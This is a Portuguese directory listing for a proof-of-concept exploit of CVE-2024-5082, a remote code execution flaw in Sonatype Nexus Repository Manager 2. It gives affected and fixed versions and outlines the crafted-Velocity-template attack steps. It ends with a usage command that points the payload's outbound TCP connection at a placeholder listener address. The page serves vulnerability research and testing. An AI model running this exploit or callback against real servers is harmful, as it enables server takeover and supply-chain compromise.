Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-5082 — Exploração de prova de conceito para CVE-2024-5082, uma vulnerabilidade de execução remota de código no Sonatype Nexus Repository Manager 2 via artefatos Maven manipulados e processamento de template Velocity. | Kitploit
Ferramentas/GitHubGitHub/h4mr3r/cve-2024-5082
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoSegurança da Cadeia de SuprimentosDesenvolvimento de Payloads
GitHubh4mr3r/cve-2024-5082

CVE-2024-5082

Exploração de prova de conceito para CVE-2024-5082, uma vulnerabilidade de execução remota de código no Sonatype Nexus Repository Manager 2 via artefatos Maven manipulados e processamento de template Velocity.

Ver Repositório
19há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Visão Geral

Este repositório contém uma prova de conceito em Python para CVE-2024-5082, uma vulnerabilidade de execução remota de código no Sonatype Nexus Repository Manager 2.

A vulnerabilidade permite que um usuário com permissão suficiente publique um artefato Maven especialmente criado e o marque para processamento pelo gerador de conteúdo Velocity. Quando o artefato é recuperado, o template Velocity incorporado é avaliado pelo Nexus e pode executar um comando no contexto de segurança da JVM do Nexus.

De acordo com a Sonatype:

  • as versões afetadas incluem Nexus Repository Manager 2.x até e incluindo 2.15.1;
  • o problema foi corrigido na versão 2.15.2;
  • o Nexus Repository 2 atingiu o fim da vida útil em 30 de junho de 2025 e deve ser migrado para o Nexus Repository 3.

Esclarecimento importante sobre o escopo

O comando é executado no host do Nexus Repository.

Baixar o artefato afetado de um servidor de build, servidor de aplicação ou estação de trabalho do desenvolvedor não executa por si só o comando incorporado nesse sistema consumidor. No entanto, o comprometimento de um gerenciador de repositórios pode criar um risco mais amplo na cadeia de suprimentos se um invasor modificar posteriormente artefatos confiáveis, entradas de build, credenciais ou configuração do repositório.

Como o PoC funciona

O script:

  1. Gera um caminho de marcador único sob um namespace estilo Maven.
  2. Faz o upload de um arquivo maven-metadata.xml criado para um repositório hospedado selecionado.
  3. Atualiza os atributos correspondentes do Nexus para que o gerador de conteúdo seja definido como velocity.
  4. Recupera o artefato carregado, fazendo com que o Nexus processe o template.
  5. Tenta remover o artefato marcador carregado durante a limpeza.

O payload fornecido cria uma conexão TCP de saída do host Nexus para o endereço do listener configurado.

Autenticação e permissões

O script atual usa autenticação básica HTTP e requer:

  • um nome de usuário e senha válidos do Nexus;
  • permissão para criar ou atualizar conteúdo no repositório selecionado;
  • permissão para a atualização de atributo usada pelo PoC.

Uso

python3 cve_2024_5082.py \\
  --base-url https://nexus.example.test/nexus \\
  --repository security-test-snapshots \\
  --username test-user \\
  --password 'REDACTED' \\
  --lhost LISTENER_IP \\
  --lport 8000
Baixar ferramenta